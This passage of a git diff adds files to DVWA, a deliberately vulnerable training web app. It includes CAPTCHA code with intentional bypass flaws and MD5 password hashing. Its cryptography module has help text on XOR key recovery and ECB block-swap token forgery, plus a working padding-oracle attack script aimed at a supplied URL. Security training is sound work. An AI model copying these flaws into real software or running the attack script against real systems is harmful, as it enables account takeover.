    "; + $hide_form = false; + } + } +} + +// Generate Anti-CSRF token +generateSessionToken(); + +?> diff --git a/DVWA/vulnerabilities/captcha/source/low.php b/DVWA/vulnerabilities/captcha/source/low.php new file mode 100644 index 00000000..bfedb56d --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/low.php @@ -0,0 +1,75 @@ +
    The CAPTCHA was incorrect. Please try again."; + $hide_form = false; + return; + } + else { + // CAPTCHA was correct. Do both new passwords match? + if( $pass_new == $pass_conf ) { + // Show next stage for the user + $html .= " + 

    You passed the CAPTCHA! Click the button to confirm your changes.
    +
    + + + + +
    "; + } + else { + // Both new passwords do not match. + $html .= "
    Both passwords must match.
    "; + $hide_form = false; + } + } +} + +if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form + $hide_form = true; + + // Get input + $pass_new = $_POST[ 'password_new' ]; + $pass_conf = $_POST[ 'password_conf' ]; + + // Check to see if both password match + if( $pass_new == $pass_conf ) { + // They do! + $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + $pass_new = md5( $pass_new ); + + // Update database + $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '
    ' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
    ' ); + + // Feedback for the end user + $html .= "
    Password Changed.
    "; + } + else { + // Issue with the passwords matching + $html .= "
    Passwords did not match.
    "; + $hide_form = false; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/captcha/source/medium.php b/DVWA/vulnerabilities/captcha/source/medium.php new file mode 100644 index 00000000..1f76e951 --- /dev/null +++ b/DVWA/vulnerabilities/captcha/source/medium.php @@ -0,0 +1,83 @@ +
    The CAPTCHA was incorrect. Please try again."; + $hide_form = false; + return; + } + else { + // CAPTCHA was correct. Do both new passwords match? + if( $pass_new == $pass_conf ) { + // Show next stage for the user + $html .= " + 

    You passed the CAPTCHA! Click the button to confirm your changes.
    +
    + + + + + +
    "; + } + else { + // Both new passwords do not match. + $html .= "
    Both passwords must match.
    "; + $hide_form = false; + } + } +} + +if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) { + // Hide the CAPTCHA form + $hide_form = true; + + // Get input + $pass_new = $_POST[ 'password_new' ]; + $pass_conf = $_POST[ 'password_conf' ]; + + // Check to see if they did stage 1 + if( !$_POST[ 'passed_captcha' ] ) { + $html .= "

    You have not passed the CAPTCHA.
    "; + $hide_form = false; + return; + } + + // Check to see if both password match + if( $pass_new == $pass_conf ) { + // They do! + $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); + $pass_new = md5( $pass_new ); + + // Update database + $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';"; + $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '
    ' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '
    ' ); + + // Feedback for the end user + $html .= "
    Password Changed.
    "; + } + else { + // Issue with the passwords matching + $html .= "
    Passwords did not match.
    "; + $hide_form = false; + } + + ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); +} + +?> diff --git a/DVWA/vulnerabilities/cryptography/help/help.php b/DVWA/vulnerabilities/cryptography/help/help.php new file mode 100644 index 00000000..3b663013 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/help/help.php @@ -0,0 +1,180 @@ + + +
    +

    Help - Cryptographic Problems

    + +
    + + + + +
    +

    About

    +

    + Cryptography is key area of security and is used to keep secrets secret. When implemented badly these secrets can be leaked or the crypto manipulated to bypass protections. +

    +

    + This module will look at three weaknesses, using encoding instead of encryption, using algorithms with known weaknesses, and padding oracle attacks. +

    + +

    + +

    Objective

    +

    Each level has its own objective but the general idea is to exploit weak cryptographic implementations.

    + +

    + +

    Low Level

    +

    The thing to notice is the mention of encoding rather than encryption, that should give you a hint about the vulnerability here.

    +

    + +

    +
    +

    Start by encoding a few messages and looking at the output, if you have spent any time around encoding standards you should be able to tell that it is in Base64. Could it be that simple? Try Base64 decoding some test strings to find out:

    + 
    encode (hello) -> HwQPBBs=
+base64decode (HwQPBBs=) -> 0x1f 0x04 0x0f 0x04 0x1b
    + 
    encode (a secret) -> FkEQDRcFChs=
+base64decode (FkEQDRcFChs=) -> 0x16 0x41 0x10 0x0d 0x17 0x05 0x0a 0x1b
    +

    +That failed, but what you might notice is that the number of output characters matches the number of input characters. Another common encoding method that is sometimes mistaken for encryption is XOR, this takes the clear text input and XORs each character with a key which is repeated or truncated to be the same length as the input.

    +

    +XOR is associative, this means that if you XOR the clear text with the key you get the cipher text and if you XOR the cipher text with the key you get the clear text, what it also means is if you XOR the clear text with the cipher text, you get the key. Let's try this with our examples: +

    + 
    encode (hello) -> HwQPBBs=
+xor (HwQPBBs=, hello) -> wacht
    +

    +This looks promising, let's try the second example: +

    + 
    encode (a secret) -> FkEQDRcFChs=
+xor (FkEQDRcFChs=, a secret) -> wachtwoo
    + +

    +There is no repetition in the key yet so let's try with a longer string. +

    + + 
    encode (thisisaverylongstringtofindthepassword) -> AwkKGx0EDhkXFg4NDAYTBBsdGwoQFQwOHRkLGxoBBwAQGwMYHQs=
+xor (thisisaverylongstringtofindthepassword, base64decode (AwkKGx0EDhkXFg4NDAYTBBsdGwoQFQwOHRkLGxoBBwAQGwMYHQs=)) -> wachtwoordwachtwoordwachtwoordwachtwoo
    + +

    +It looks like we have found our key "wachtwoord". Let's give it a try on our challenge string: +

    + +
    xor (base64decode(Lg4WGlQZChhSFBYSEB8bBQtPGxdNQSwEHREOAQY=), wachtwoord) -> Your new password is: Olifant
    + + +

    +And there we have it, the message we are looking for and the password we need to login. +

    + +

    Another lesson here, do not assume that the messages or the underlying system you are working with is in English. The key "wachtwoord" is Dutch for password.

    +
    + +

    Medium Level

    +

    The tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). In this mode, the clear text is broken down into fixed sized blocks and each block is encrypted independently of the rest. This results in a cipher text that is made up from a number of individual blocks with no way to tie them together. Worse than this, any two blocks, from any two clear text inputs, are interchangeable as long as they have been encrypted with the same key. In our example, this means you can take blocks from the three different tokens to make your own token.

    +

    + +

    +
    +

    + How do you know the block size? This is given in the algorithm name. aes-128-ebc is a 128 bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters meaning each byte is two characters. This gives you a block size of 32 characters. Sooty's token is 192 characters long, 192 / 32 = 6 and so Sooty's token has six code blocks. +

    + +

    +Let's start by breaking the tokens down into blocks.

    +

    Sooty:

    +
    e287af752ed3f9601befd45726785bd9
+b85bb230876912bf3c66e50758b222d0
+837d1e6b16bfae07b776feb7afe57630
+5aec34b41499579d3fb6acc8dc92fd5f
+cea8743c3b2904de83944d6b19733cdb
+48dd16048ed89967c250ab7f00629dba
    +

    + +

    Sweep:

    +
    3061837c4f9debaf19d4539bfa0074c1
+b85bb230876912bf3c66e50758b222d0
+83f2d277d9e5fb9a951e74bee57c77a3
+caeb574f10f349ed839fbfd223903368
+873580b2e3e494ace1e9e8035f0e7e07
    + +

    Soo:

    +
    5fec0b1c993f46c8bad8a5c8d9bb9698
+174d4b2659239bbc50646e14a70becef
+83f2d277d9e5fb9a951e74bee57c77a3
+c9acb1f268c06c5e760a9d728e081fab
+65e83b9f97e65cb7c7c4b8427bd44abc
+16daa00fd8cd0105c97449185be77ef5
    + +

    + Each token has broken down nicely into blocks so we are on the right track. +

    +

    + If you look carefully at the blocks you will see that there are some that repeat over the different tokens, this means that the same clear text has been encrypted to create the block. If we look at the description we can try to map these to the JSON object. +

    +

    + Taking Sooty as an example: +

    +

    Sooty:

    +
    e287af752ed3f9601befd45726785bd9 <- Username
+b85bb230876912bf3c66e50758b222d0 <- Expiry
+837d1e6b16bfae07b776feb7afe57630 <- Level
+5aec34b41499579d3fb6acc8dc92fd5f <- Bio
+cea8743c3b2904de83944d6b19733cdb
+48dd16048ed89967c250ab7f00629dba
    +

    +

    + Assuming we are right with our mappings, if you compare the blocks that match you can see that Sooty and Sweep both have the same expiry block (b85bb230876912bf3c66e50758b222d0) and both Sweep and Soo have the same level block (83f2d277d9e5fb9a951e74bee57c77a3). This matches with what we know about the tokens as both Sooty and Sweep have expired tokens and both Sweep and Soo are users, not admins. +

    +

    + Knowing all this, we can now create our forged session token. We need to take the username block from Sweep, the expiry block from Soo and the level block from Sooty. We can then finish the token off with the remaining blocks from any of the tokens. This gives us: +

    +
    3061837c4f9debaf19d4539bfa0074c1 <- Sweep as username
+174d4b2659239bbc50646e14a70becef <- Soo's expiry time
+837d1e6b16bfae07b776feb7afe57630 <- Sooty's admin privileges
+caeb574f10f349ed839fbfd223903368 <- Finish off with Sweep's bio
+873580b2e3e494ace1e9e8035f0e7e07
    +

    + Which gives us... +

    +

    + +

    +

    + This is a very contrived setup with the tokens tweaked to force blocks to map to the JSON object so manipulation is easier to do, in the real world it is unlikely to be this easy however as data is often formed from fixed sized blocks overlaps can happen in a way that mixing blocks up results in valid data. Sometimes just being able to pass invalid data is enough so all that is needed is to swap blocks in a way that they can be decrypted and then passed on to the rest of the system where they will cause errors. +

    +

    + If you want to play with this some more, there is a script called ecb_attack.php in the sources directory which shows how the tokens were generated and lets you combine them in different ways to create custom tokens. +

    +
    + +

    High Level

    +

    The system is using AES-128-CBC which means it is vulnerable to a padding oracle attack.

    + +

    + +

    + +
    +

    Rather than try to explain this here, go read this excellent write up on the attack by Eli Sohl.

    +

    Cryptopals: Exploiting CBC Padding Oracles

    +

    + If you want to play with this some more, there is a script called oracle_attack.php in the sources directory which runs through the full attack with debug. You can run this either against the DVWA site or it will run locally against its own pretend web server. +

    +
    + +

    Impossible Level

    +

    You can never say impossible in crypto as something that would take years today could take minutes in the future when a new attack is found or when processing power takes a giant leam forward.

    +

    + The current recommended alternative to AES-CBC is AES-GCM and so the system uses that here. 256 bit blocks rather than 128 bit blocks are used, and a unique IV used for every message. This may be secure today but who knows what tomorrow brings? +

    +
    + +
    + +
    diff --git a/DVWA/vulnerabilities/cryptography/index.php b/DVWA/vulnerabilities/cryptography/index.php new file mode 100644 index 00000000..c8a58222 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/index.php @@ -0,0 +1,65 @@ + +

    Vulnerability: Cryptography Problems

    + +
    +"; + +$page[ 'body' ] .= " + {$html} +
    + +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://exploit-notes.hdks.org/exploit/cryptography/algorithm/aes-ecb-padding-attack', "AES-ECB Padding Attack" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.scottbrady91.com/cryptopals/implementing-and-breaking-aes-ecb', "Implementing and breaking AES ECB") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation', "Wikipedia - Block cipher mode of operation" ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.nccgroup.com/us/research-blog/cryptopals-exploiting-cbc-padding-oracles/', "Cryptopals: Exploiting CBC Padding Oracles - Best article") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://yurichev.org/pkcs7/', "[Crypto] PKCS#7 padding") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Padding_oracle_attack', "Padding oracle attack") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://medium.com/@masjadaan/oracle-padding-attack-a61369993c86', "Oracle Padding Attack") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://robertheaton.com/2013/07/29/padding-oracle-attack/', "The Padding Oracle Attack") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Padding_%28cryptography%29', "Wikipedia - Padding (cryptography)") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://gchq.github.io/CyberChef/', "CyberChef") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.101computing.net/xor-encryption-algorithm/', "XOR Encryption Algorithm") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/XOR_cipher', "XOR Cipher") . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=7WySPRERN0Q', "Video walk-through by CryptoCat") . "
      • +
    +\n"; + +dvwaHtmlEcho( $page ); + +?> + diff --git a/DVWA/vulnerabilities/cryptography/source/check_token_high.php b/DVWA/vulnerabilities/cryptography/source/check_token_high.php new file mode 100644 index 00000000..1c2ce95a --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/check_token_high.php @@ -0,0 +1,25 @@ + 527, + "message" => "Content type must be application/json" + )); + } else { + $token = $jsonData = file_get_contents('php://input'); + $ret = check_token ($token); + } +} else { + $ret = json_encode (array ( + "status" => 405, + "message" => "Method not supported" + )); +} + +print $ret; +exit; diff --git a/DVWA/vulnerabilities/cryptography/source/check_token_impossible.php b/DVWA/vulnerabilities/cryptography/source/check_token_impossible.php new file mode 100644 index 00000000..cba0ef24 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/check_token_impossible.php @@ -0,0 +1,25 @@ + 527, + "message" => "Content type must be application/json" + )); + } else { + $token = $jsonData = file_get_contents('php://input'); + $ret = check_token ($token); + } +} else { + $ret = json_encode (array ( + "status" => 405, + "message" => "Method not supported" + )); +} + +print $ret; +exit; diff --git a/DVWA/vulnerabilities/cryptography/source/download_ecb_attack.php b/DVWA/vulnerabilities/cryptography/source/download_ecb_attack.php new file mode 100644 index 00000000..5d28b531 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/download_ecb_attack.php @@ -0,0 +1,16 @@ + diff --git a/DVWA/vulnerabilities/cryptography/source/download_oracle_attack.php b/DVWA/vulnerabilities/cryptography/source/download_oracle_attack.php new file mode 100644 index 00000000..25740da1 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/download_oracle_attack.php @@ -0,0 +1,16 @@ + diff --git a/DVWA/vulnerabilities/cryptography/source/ecb_attack.php b/DVWA/vulnerabilities/cryptography/source/ecb_attack.php new file mode 100644 index 00000000..4a245b0f --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/ecb_attack.php @@ -0,0 +1,98 @@ +user == "sweep" && $user->ex > time() && $user->level == "admin") { + print "Welcome administrator Sweep\n"; +} else { + print "Failed\n"; +} + +?> diff --git a/DVWA/vulnerabilities/cryptography/source/high.php b/DVWA/vulnerabilities/cryptography/source/high.php new file mode 100644 index 00000000..f1cbe341 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/high.php @@ -0,0 +1,70 @@ + + function send_token() { + + const url = 'source/check_token_high.php'; + const data = document.getElementById ('token').value; + + console.log (data); + + fetch(url, { + method: 'POST', + headers: { + 'Content-Type': 'application/json' + }, + body: data + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + console.log(data); + message_line = document.getElementById ('message'); + if (data.status == 200) { + message_line.innerText = 'Welcome back ' + data.user + ' (' + data.level + ')'; + message_line.setAttribute('class', 'success'); + } else { + message_line.innerText = 'Error: ' + data.message; + message_line.setAttribute('class', 'warning'); + } + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + + } + +

    + You have managed to steal the following token from a user of the Prognostication application. +

    +

    + +

    +

    + You can use the form below to provide the token to access the system. You have two challenges, first, decrypt the token to find out the secret it contains, and then create a new token to access the system as a other users. See if you can make yourself an administrator. +

    +
    +
    +
    +

    +

    +

    + +

    +
    +"; + +?> diff --git a/DVWA/vulnerabilities/cryptography/source/impossible.php b/DVWA/vulnerabilities/cryptography/source/impossible.php new file mode 100644 index 00000000..6e5342d1 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/impossible.php @@ -0,0 +1,70 @@ + + function send_token() { + + const url = 'source/check_token_impossible.php'; + const data = document.getElementById ('token').value; + + console.log (data); + + fetch(url, { + method: 'POST', + headers: { + 'Content-Type': 'application/json' + }, + body: data + }) + .then(response => { + if (!response.ok) { + throw new Error('Network response was not ok'); + } + return response.json(); + }) + .then(data => { + console.log(data); + message_line = document.getElementById ('message'); + if (data.status == 200) { + message_line.innerText = 'Welcome back ' + data.user + ' (' + data.level + ')'; + message_line.setAttribute('class', 'success'); + } else { + message_line.innerText = 'Error: ' + data.message; + message_line.setAttribute('class', 'warning'); + } + }) + .catch(error => { + console.error('There was a problem with your fetch operation:', error); + }); + + } + +

    + You have managed to steal the following token from a user of the Impervious application. +

    +

    + +

    +

    + This being the impossible level, you should not be able to mess with the token in any useful way but feel free to try below. +

    +
    +
    +
    +

    +

    +

    + +

    +
    +"; + +?> diff --git a/DVWA/vulnerabilities/cryptography/source/low.php b/DVWA/vulnerabilities/cryptography/source/low.php new file mode 100644 index 00000000..235ed19d --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/low.php @@ -0,0 +1,112 @@ +getMessage(); + } +} + +$html = " +

    + This super secure system will allow you to exchange messages with your friends without anyone else being able to read them. Use the box below to encode and decode messages. +

    +
    +

    +

    +

    + or + +

    +

    + +

    +
    +"; + +if (!is_null ($encoded)) { + $html .= " +

    +

    "; +} + +$html .= " +
    +

    + You have intercepted the following message, decode it and log in below. +

    +

    + +

    +"; + +if ($errors != "") { + $html .= '
    ' . $errors . '
    '; +} + +if ($messages != "") { + $html .= '
    ' . $messages . '
    '; +} + +if ($success != "") { + $html .= '
    ' . $success . '
    '; +} + +$html .= " +
    +

    +

    +

    + +

    +
    +"; +?> diff --git a/DVWA/vulnerabilities/cryptography/source/medium.php b/DVWA/vulnerabilities/cryptography/source/medium.php new file mode 100644 index 00000000..b07efcc3 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/medium.php @@ -0,0 +1,110 @@ +user == "sweep" && $user->ex > time() && $user->level == "admin") { + $success = "Welcome administrator Sweep"; + } else { + $messages = "Login successful but not as the right user."; + } + } + } + } catch(Exception $e) { + $errors = $e->getMessage(); + } +} + +$html = " +

    + You have managed to get hold of three session tokens for an application you think is using poor cryptography to protect its secrets: +

    +

    + Sooty (admin), session expired +

    +

    + +

    +

    + Sweep (user), session expired +

    +

    + +

    +

    + Soo (user), session valid +

    +

    + +

    +

    + Based on the documentation, you know the format of the token is: +

    + 
    {
+    \"user\": \"example\",
+    \"ex\": 1723620372,
+    \"level\": \"user\",
+    \"bio\": \"blah\"
+}
    +

    +You also spot this comment in the docs: +

    +
    +To ensure your security, we use aes-128-ecb throughout our application. +
    + +
    +

    + Manipulate the session tokens you have captured to log in as Sweep with admin privileges. +"; + +if ($errors != "") { + $html .= '

    ' . $errors . '
    '; +} + +if ($messages != "") { + $html .= '
    ' . $messages . '
    '; +} + +if ($success != "") { + $html .= '
    ' . $success . '
    '; +} + +$html .= " +
    +

    +

    +

    + +

    +
    +"; +?> diff --git a/DVWA/vulnerabilities/cryptography/source/oracle_attack.php b/DVWA/vulnerabilities/cryptography/source/oracle_attack.php new file mode 100644 index 00000000..3ecb454b --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/oracle_attack.php @@ -0,0 +1,318 @@ + $token, + "iv" => $iv_string_b64 + ); + + if (is_null ($url)) { + $body = check_token (json_encode ($data)); + } else { + $ch = curl_init(); + + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json', 'Accept:application/json')); + curl_setopt($ch, CURLOPT_POST, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode ($data)); + + curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); + curl_setopt($ch, CURLOPT_HEADER, true); + + $response = curl_exec($ch); + + $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE); + $header = substr($response, 0, $header_size); + $body = substr($response, $header_size); + + // May return false or something that evaluates to false + // so can't do strict type check + if ($response == false) { + print "Could not access remote server, is the URL correct? +${url} +"; + exit; + } + if (strpos ($header, "200 OK") === false) { + print "Check token script not found, have you got the right URL? +${url} +"; + exit; + } + + curl_close($ch); + } + + return json_decode ($body, true); +} + +function do_attack ($iv_string_b64, $token, $url) { + $iv_string = base64_decode ($iv_string_b64); + $temp_init_iv = unpack('C*', $iv_string); + + # The unpack creates an array starting a 1, the + # rest of this code assumes an array starting at 0 + # so calling array_values changes the array 0 based + + $init_iv = array_values ($temp_init_iv); + + print "Trying to decrypt\n"; + print "\n"; + + $iv = zero_array(16); + $zeroing = zero_array(16); + + + for ($padding = 1; $padding <= 16; $padding++) { + $offset = 16 - $padding; + print ("Looking at offset $offset for padding $padding\n"); + for ($i = 0; $i <= 0xff; $i++) { + $iv[$offset] = $i; + for ($k = $offset + 1; $k < 16; $k++) { + $iv[$k] = $zeroing[$k] ^ $padding; + } + try { + $obj = make_call ($token, $iv, $url); + + # 526 is decryption failed + if ($obj['status'] != 526) { + print "Got hit for: " . $i . "\n"; + + # Only get here if the decrypt works correctly + + /* + + Check for edge case on offset 15 (right most byte). + The decrypted data could look like this: + + 0x44 ... 0x02 0x02 + ^^^^ Real last byte of value 2 byte padding + + In this situation, if we happen to land on a value + that sets the last byte to 0x02 then that will + look like valid padding as it will make the data end + in 0x02 0x02 as it already does: + + 0x44 ... 0x02 0x02 + ^^^^ Fluke, we want 0x01 for 1 byte padding + + This is what we want: + + 0x44 ... 0x02 0x01 + ^^^^ Valid 1 byte padding + + To do this, change the IV value for offset 14 which will + change the second to last byte and make the call again. + If we were in the edge case we would now have: + + 0x44 ... 0xf3 0x02 + ^^^^ No longer valid padding + + This is no longer valid padding so it will fail and we can + continue looking till we find the value that gives us + valid 1 byte padding. + + */ + + // Used by the edge case check + + $ignore = false; + if ($offset == 15) { + print "Got a valid decrypt for offset 15, checking edge case\n"; + $temp_iv = $iv; + $temp_iv[14] = 0xff; + $temp_d_obj = make_call ($token, $temp_iv, $url); + if ($temp_d_obj['status'] != 526) { + print "Not edge case, can continue\n"; + } else { + print "Edge case, do not continue\n"; + $ignore = true; + } + } + + if (!$ignore) { + print "There was a match\n"; + $zeroing[$offset] = $i ^ $padding; + # print "IV: " . byte_array_to_string ($iv) . "\n"; + # print "Zero: " . byte_array_to_string ($zeroing) . "\n"; + break; + } + } + } catch(Exception $exp) { + # print "Fail\n"; + # var_dump ($e); + } + } + } + + print "\n"; + print "Finished looping\n"; + print "\n"; + + print "Derived IV is: " . byte_array_to_string ($iv) . "\n"; + + # If you want to check this, it should be all 16 to show it is all padding + # $x = xor_byte_array ($iv, $zeroing); + # print "Derived IV XOR and zeroing string: " . byte_array_to_string ($x) . "\n"; + + print "Real IV is: " . byte_array_to_string ($init_iv) . "\n"; + print "Zeroing array is: " . byte_array_to_string ($zeroing) . "\n"; + print "\n"; + + $x = xor_byte_array ($init_iv, $zeroing); + print "Decrypted string with padding: " . byte_array_to_string ($x) . "\n"; + $number_of_padding_bytes = $x[15]; + $without_padding = array_slice ($x, 0, 16 - $number_of_padding_bytes); + print "Decrypted string without padding: " . byte_array_to_string ($without_padding) . "\n"; + + $str = ''; + for ($i = 0; $i < count ($without_padding); $i++) { + $c = $without_padding[$i]; + if ($c > 0x19 && $c < 0x7f) { + $str .= chr($c); + } else { + $str .= "0x" . sprintf ("%02x", $c) . " "; + } + } + + print "Decrypted string as text: " . $str . "\n"; + + /* + Trying to modify decrypted data by playing with the zeroing array. + */ + + print "\n"; + print "Trying to modify string\n"; + print "\n"; + + $new_clear = "userid:1"; + print "New clear text: " . $new_clear . "\n"; + + for ($i = 0; $i < strlen($new_clear); $i++) { + $zeroing[$i] = $zeroing[$i] ^ ord($new_clear[$i]); + } + $padding = 16 - strlen($new_clear); + $offset = 16 - $padding; + for ($i = $offset; $i < 16; $i++) { + $zeroing[$i] = $zeroing[$i] ^ $padding; + } + + print "New IV is: " . byte_array_to_string ($zeroing) . "\n"; + print "\n"; + + print "Sending new data to server...\n"; + print "\n"; + + try { + $ret_obj = make_call ($token, $zeroing, $url); + + print "Response from server:\n"; + var_dump ($ret_obj); + + if ($ret_obj['status'] == 200 && $ret_obj['level'] == "admin") { + print "\n"; + print "Hack success!\n\n"; + print "The new token is:\n"; + + # This maps the IV byte array down to a string + $iv_string = implode(array_map("chr", $zeroing)); + + # Now base64 encode it so it is safe to send + $iv_string_b64 = base64_encode ($iv_string); + + $new_token = array ( + "token" => $token, + "iv" => $iv_string_b64 + ); + print json_encode ($new_token); + print "\n\n"; + } else { + print "Hack failed\n"; + } + } catch (Exception $exp) { + print "Hack failed, system could not decrypt message\n"; + var_dump ($exp); + } +} + +$shortopts = ""; +$shortopts .= "h"; // Help + +$longopts = array( +"url:", // Required value +"iv:", // Required value +"token:", // Required value +"local", // No value +"help", // No value +); +$options = getopt($shortopts, $longopts); + +if (array_key_exists ("h", $options) || array_key_exists ("help", $options)) { + print "This script can either test against a local decryptor or a remote.\n +To test locally, pass --local, otherwise pass the IV, token and URL for the remote system. + +--local - Test locally +--iv - IV from remote system +--token - Token from remote system +--url - URL for the check function +-h, --help - help + +"; + exit; +} elseif (array_key_exists ("l", $options) || array_key_exists ("local", $options)) { + print "Creating the token locally\n\n"; + + $token_data = json_decode (create_token(true), true); + + $token = $token_data['token']; + $iv = $token_data['iv']; + $url = null; +} elseif (array_key_exists ("iv", $options) && + array_key_exists ("token", $options) && + array_key_exists ("url", $options)) { + print "Attacking remote server using parameters provided\n\n"; + + $token = $options['token']; + $iv = $options['iv']; + $url = $options['url']; +} else { + print "Either specify --local or provide the IV, token and URL\n\n"; + exit; +} + +do_attack ($iv, $token, $url); diff --git a/DVWA/vulnerabilities/cryptography/source/token_library_high.php b/DVWA/vulnerabilities/cryptography/source/token_library_high.php new file mode 100644 index 00000000..29c93559 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/token_library_high.php @@ -0,0 +1,132 @@ + base64_encode ($e), + "iv" => base64_encode (IV) + ); + return json_encode($data); +} + +function check_token ($data) { + $users = array (); + $users[1] = array ("name" => "Geoffery", "level" => "admin"); + $users[2] = array ("name" => "Bungle", "level" => "user"); + $users[3] = array ("name" => "Zippy", "level" => "user"); + $users[4] = array ("name" => "George", "level" => "user"); + + $data_array = false; + try { + $data_array = json_decode ($data, true); + } catch (TypeError $exp) { + $ret = array ( + "status" => 521, + "message" => "Data not in JSON format", + "extra" => $exp->getMessage() + ); + } + + if (is_null ($data_array)) { + $ret = array ( + "status" => 522, + "message" => "Data in wrong format" + ); + } else { + if (!array_key_exists ("token", $data_array)) { + $ret = array ( + "status" => 523, + "message" => "Missing token" + ); + return json_encode ($ret); + } + if (!array_key_exists ("iv", $data_array)) { + $ret = array ( + "status" => 524, + "message" => "Missing IV" + ); + return json_encode ($ret); + } + + $ciphertext = base64_decode ($data_array['token']); + $iv = base64_decode ($data_array['iv']); + + # Asssume failure + $ret = array ( + "status" => 500, + "message" => "Unknown error" + ); + try { + $d = decrypt ($ciphertext, $iv); + if (preg_match ("/^userid:(\d+)$/", $d, $matches)) { + $id = $matches[1]; + if (array_key_exists ($id, $users)) { + $user = $users[$id]; + $ret = array ( + "status" => 200, + "user" => $user["name"], + "level" => $user['level'] + ); + } else { + $ret = array ( + "status" => 525, + "message" => "User not found" + ); + } + } else { + $ret = array ( + "status" => 527, + "message" => "No user specified" + ); + } + } catch (Exception $exp) { + $ret = array ( + "status" => 526, + "message" => "Unable to decrypt token", + "extra" => $exp->getMessage() + ); + } + } + return json_encode ($ret); +} diff --git a/DVWA/vulnerabilities/cryptography/source/token_library_impossible.php b/DVWA/vulnerabilities/cryptography/source/token_library_impossible.php new file mode 100644 index 00000000..4f31a6a0 --- /dev/null +++ b/DVWA/vulnerabilities/cryptography/source/token_library_impossible.php @@ -0,0 +1,130 @@ + base64_encode ($e), + "iv" => base64_encode ($iv), + ); + return json_encode($data); +} + +function check_token ($data) { + $users = array (); + $users[1] = array ("name" => "Geoffery", "level" => "admin"); + $users[2] = array ("name" => "Bungle", "level" => "user"); + $users[3] = array ("name" => "Zippy", "level" => "user"); + $users[4] = array ("name" => "George", "level" => "user"); + + $data_array = false; + try { + $data_array = json_decode ($data, true); + } catch (TypeError $exp) { + $ret = array ( + "status" => 521, + "message" => "Data not in JSON format", + "extra" => $exp->getMessage() + ); + } + + if (is_null ($data_array)) { + $ret = array ( + "status" => 522, + "message" => "Data in wrong format" + ); + } else { + if (!array_key_exists ("token", $data_array)) { + $ret = array ( + "status" => 523, + "message" => "Missing token" + ); + return json_encode ($ret); + } + if (!array_key_exists ("iv", $data_array)) { + $ret = array ( + "status" => 524, + "message" => "Missing IV" + ); + return json_encode ($ret); + } + + $ciphertext = base64_decode ($data_array['token']); + $iv = base64_decode ($data_array['iv']); + + # Asssume failure + $ret = array ( + "status" => 500, + "message" => "Unknown error" + ); + try { + $d = decrypt ($ciphertext, $iv); + if (preg_match ("/^userid:(\d+)$/", $d, $matches)) { + $id = $matches[1]; + if (array_key_exists ($id, $users)) { + $user = $users[$id]; + $ret = array ( + "status" => 